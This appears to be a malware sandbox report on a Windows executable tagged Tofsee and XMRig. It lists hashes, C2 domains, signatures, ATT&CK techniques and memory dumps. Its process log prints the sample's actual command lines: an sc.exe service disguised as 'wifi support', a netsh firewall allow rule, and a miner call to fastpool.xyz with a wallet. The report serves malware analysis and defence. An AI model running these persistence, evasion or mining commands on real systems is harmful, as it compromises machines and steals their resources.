Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    05-06-2022 16:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a1c9d7d5091f166d03f93df1d3269a6c69992e6e341b1589cc23d4a7542e13c8.exe

  • Size

    266KB

  • MD5

    5776bc1023f6b1b5f7d9c5b39eaa43d2

  • SHA1

    3683e53820c2dc4586bce7ae76ff6ae408854f71

  • SHA256

    a1c9d7d5091f166d03f93df1d3269a6c69992e6e341b1589cc23d4a7542e13c8

  • SHA512

    61b1d8fee0414e3c1927b5581169a635e311b506254755e9f8bbe6b94e2c05325bebc5288274e90efdc83e963681e080b7b75c49b6078309dcad68941cc8b280

Score
10/10
tofseexmrigcollectionevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a1c9d7d5091f166d03f93df1d3269a6c69992e6e341b1589cc23d4a7542e13c8.exe
    "C:\Users\Admin\AppData\Local\Temp\a1c9d7d5091f166d03f93df1d3269a6c69992e6e341b1589cc23d4a7542e13c8.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3192
  • C:\Users\Admin\AppData\Local\Temp\1BB6.exe
    C:\Users\Admin\AppData\Local\Temp\1BB6.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gblgqloe\
      2⤵
        PID:4924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zarlyemp.exe" C:\Windows\SysWOW64\gblgqloe\
        2⤵
          PID:5100
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create gblgqloe binPath= "C:\Windows\SysWOW64\gblgqloe\zarlyemp.exe /d\"C:\Users\Admin\AppData\Local\Temp\1BB6.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3960
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description gblgqloe "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2492
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start gblgqloe
          2⤵
          • Launches sc.exe
          PID:4744
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4484
      • C:\Windows\SysWOW64\gblgqloe\zarlyemp.exe
        C:\Windows\SysWOW64\gblgqloe\zarlyemp.exe /d"C:\Users\Admin\AppData\Local\Temp\1BB6.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4228
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2968
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3160
      • C:\Users\Admin\AppData\Local\Temp\5564.exe
        C:\Users\Admin\AppData\Local\Temp\5564.exe
        1⤵
        • Executes dropped EXE
        PID:2452
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        1⤵
        • Accesses Microsoft Outlook profiles
        • outlook_office_path
        • outlook_win_path
        PID:3992
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe
        1⤵
          PID:4428

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        New Service

        1
        T1050

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        New Service

        1
        T1050

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Discovery

        System Information Discovery

        2
        T1082

        Query Registry

        1
        T1012

        Peripheral Device Discovery

        1
        T1120

        Lateral Movement

        Collection

        Email Collection

        1
        T1114

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\1BB6.exe
          Filesize

          265KB

          MD5

          5c91bd85be127a0522ea8d24e857c675

          SHA1

          830d13fa10b75ec50a0b87c5d38205456fb3e80b

          SHA256

          78f4c534b503d72f05f75227f8fead70ae19607e90a7e39d02a05e69d1333dfe

          SHA512

          ff0c5ea5a94916f358065385544d05adc984d5e5dab0e37c333175455d2aec7f14dbbb05dfa3cd164b07b14f62c3d83570b5af50e2f7fec189e46d50ccf33bb6

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\1BB6.exe
          Filesize

          265KB

          MD5

          5c91bd85be127a0522ea8d24e857c675

          SHA1

          830d13fa10b75ec50a0b87c5d38205456fb3e80b

          SHA256

          78f4c534b503d72f05f75227f8fead70ae19607e90a7e39d02a05e69d1333dfe

          SHA512

          ff0c5ea5a94916f358065385544d05adc984d5e5dab0e37c333175455d2aec7f14dbbb05dfa3cd164b07b14f62c3d83570b5af50e2f7fec189e46d50ccf33bb6

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\5564.exe
          Filesize

          4.3MB

          MD5

          d3d62d8d274195ab9af9c028fea9ca4b

          SHA1

          ae84938ab3b4bb8411f726f617cec9a4707da43e

          SHA256

          4751a136cf8bf5807b4714ebfba31096ed385b4e424bdb4d9cd94c5da18dfb19

          SHA512

          7633107dd57fce28e8f150d32c56226670065128ea1882decb6257314df1202c33673fc4b56a0a28196500bcc595db8bc5fc6dd5f3e6a3d9f4234af9b03f0b15

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\5564.exe
          Filesize

          4.3MB

          MD5

          d3d62d8d274195ab9af9c028fea9ca4b

          SHA1

          ae84938ab3b4bb8411f726f617cec9a4707da43e

          SHA256

          4751a136cf8bf5807b4714ebfba31096ed385b4e424bdb4d9cd94c5da18dfb19

          SHA512

          7633107dd57fce28e8f150d32c56226670065128ea1882decb6257314df1202c33673fc4b56a0a28196500bcc595db8bc5fc6dd5f3e6a3d9f4234af9b03f0b15

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\zarlyemp.exe
          Filesize

          11.7MB

          MD5

          af1d6f5b2b6bfcae30f4dab26afc7717

          SHA1

          32477d97c69c346b4b3a7860e1ca543b79754771

          SHA256

          ae78c00908c9e0f263dd7936cd8bd7e9937dfb6a4225fd178ed6ebcf45d2f9aa

          SHA512

          16c43eb407edd24dc286e20aa1d8bedcacc0d9681f670148be16f4b8d82f2d33645b5e3c7bae140639d2ab55df5059f3b543b73d1a2d37aab46cda07d43d122d

          Download Submit
        • C:\Windows\SysWOW64\gblgqloe\zarlyemp.exe
          Filesize

          11.7MB

          MD5

          af1d6f5b2b6bfcae30f4dab26afc7717

          SHA1

          32477d97c69c346b4b3a7860e1ca543b79754771

          SHA256

          ae78c00908c9e0f263dd7936cd8bd7e9937dfb6a4225fd178ed6ebcf45d2f9aa

          SHA512

          16c43eb407edd24dc286e20aa1d8bedcacc0d9681f670148be16f4b8d82f2d33645b5e3c7bae140639d2ab55df5059f3b543b73d1a2d37aab46cda07d43d122d

          Download Submit
        • memory/2452-429-0x0000000000000000-mapping.dmp
          Download
        • memory/2452-722-0x0000000000900000-0x000000000101C000-memory.dmp
          Filesize

          7.1MB

          Download
        • memory/2452-523-0x0000000000900000-0x000000000101C000-memory.dmp
          Filesize

          7.1MB

          Download
        • memory/2452-721-0x0000000000900000-0x000000000101C000-memory.dmp
          Filesize

          7.1MB

          Download
        • memory/2492-227-0x0000000000000000-mapping.dmp
          Download
        • memory/2968-427-0x0000000002B00000-0x0000000002B15000-memory.dmp
          Filesize

          84KB

          Download
        • memory/2968-351-0x0000000002B09A6B-mapping.dmp
          Download
        • memory/2968-656-0x0000000002B00000-0x0000000002B15000-memory.dmp
          Filesize

          84KB

          Download
        • memory/3160-691-0x000000000069259C-mapping.dmp
          Download
        • memory/3192-148-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-132-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-134-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-135-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-136-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-137-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-138-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-139-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-140-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-141-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-142-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-143-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-144-0x0000000002DC0000-0x0000000002E6E000-memory.dmp
          Filesize

          696KB

          Download
        • memory/3192-146-0x00000000001D0000-0x00000000001D9000-memory.dmp
          Filesize

          36KB

          Download
        • memory/3192-147-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-118-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-149-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-145-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-150-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-151-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-152-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-153-0x0000000000400000-0x0000000002DBA000-memory.dmp
          Filesize

          41.7MB

          Download
        • memory/3192-154-0x0000000000400000-0x0000000002DBA000-memory.dmp
          Filesize

          41.7MB

          Download
        • memory/3192-133-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-131-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-130-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-129-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-127-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-119-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-120-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-121-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-128-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-126-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-122-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-123-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-117-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3192-124-0x0000000002E61000-0x0000000002E71000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3192-125-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/3960-220-0x0000000000000000-mapping.dmp
          Download
        • memory/3992-477-0x0000000000000000-mapping.dmp
          Download
        • memory/3992-635-0x0000000000400000-0x0000000000474000-memory.dmp
          Filesize

          464KB

          Download
        • memory/3992-636-0x0000000000190000-0x00000000001FB000-memory.dmp
          Filesize

          428KB

          Download
        • memory/3992-655-0x0000000000190000-0x00000000001FB000-memory.dmp
          Filesize

          428KB

          Download
        • memory/4228-371-0x0000000000400000-0x0000000002DBA000-memory.dmp
          Filesize

          41.7MB

          Download
        • memory/4228-327-0x0000000002F10000-0x000000000305A000-memory.dmp
          Filesize

          1.3MB

          Download
        • memory/4428-509-0x0000000000000000-mapping.dmp
          Download
        • memory/4428-524-0x0000000000880000-0x000000000088C000-memory.dmp
          Filesize

          48KB

          Download
        • memory/4484-256-0x0000000000000000-mapping.dmp
          Download
        • memory/4680-167-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-170-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-182-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-183-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-184-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-185-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-186-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-188-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-189-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-187-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-155-0x0000000000000000-mapping.dmp
          Download
        • memory/4680-157-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-216-0x0000000000400000-0x0000000002DBA000-memory.dmp
          Filesize

          41.7MB

          Download
        • memory/4680-178-0x0000000003011000-0x0000000003022000-memory.dmp
          Filesize

          68KB

          Download
        • memory/4680-180-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-179-0x00000000001D0000-0x00000000001E3000-memory.dmp
          Filesize

          76KB

          Download
        • memory/4680-159-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-177-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-176-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-261-0x0000000003011000-0x0000000003022000-memory.dmp
          Filesize

          68KB

          Download
        • memory/4680-264-0x00000000001D0000-0x00000000001E3000-memory.dmp
          Filesize

          76KB

          Download
        • memory/4680-269-0x0000000000400000-0x0000000002DBA000-memory.dmp
          Filesize

          41.7MB

          Download
        • memory/4680-175-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-174-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-173-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-172-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-169-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-171-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-181-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-168-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-166-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-165-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-163-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-162-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-161-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-160-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4680-158-0x0000000077750000-0x00000000778DE000-memory.dmp
          Filesize

          1.6MB

          Download
        • memory/4744-243-0x0000000000000000-mapping.dmp
          Download
        • memory/4924-207-0x0000000000000000-mapping.dmp
          Download
        • memory/5100-213-0x0000000000000000-mapping.dmp
          Download